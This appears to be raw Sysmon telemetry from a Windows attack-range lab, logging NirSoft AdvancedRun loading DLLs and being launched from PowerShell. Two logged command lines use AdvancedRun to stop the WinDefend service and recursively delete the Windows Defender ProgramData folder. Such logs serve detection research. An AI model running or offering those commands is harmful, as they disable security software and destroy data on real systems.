734700x80000000000000003928811Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928810Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928808Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928807Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928800Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928799Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003928792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.224{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003928791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.224{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003928790Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.234{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003927755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:10:52.685{834264DD-E91C-61EA-BC02-000000002702}4044C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$Env:temp\advancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $Env:temp\advancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003927383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:10:45.386{834264DD-E915-61EA-B902-000000002702}3796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path $Env:temp\advancedrun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003926111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:09:42.683{834264DD-E8D6-61EA-AF02-000000002702}3768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path $Env:temp\advancedrun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003924439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:44.982{834264DD-E89C-61EA-A302-000000002702}2972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$Env:temp\advancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $Env:temp\advancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003924321Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:30.755{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003924294Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924293Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924292Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924291Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924290Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924289Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924286Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 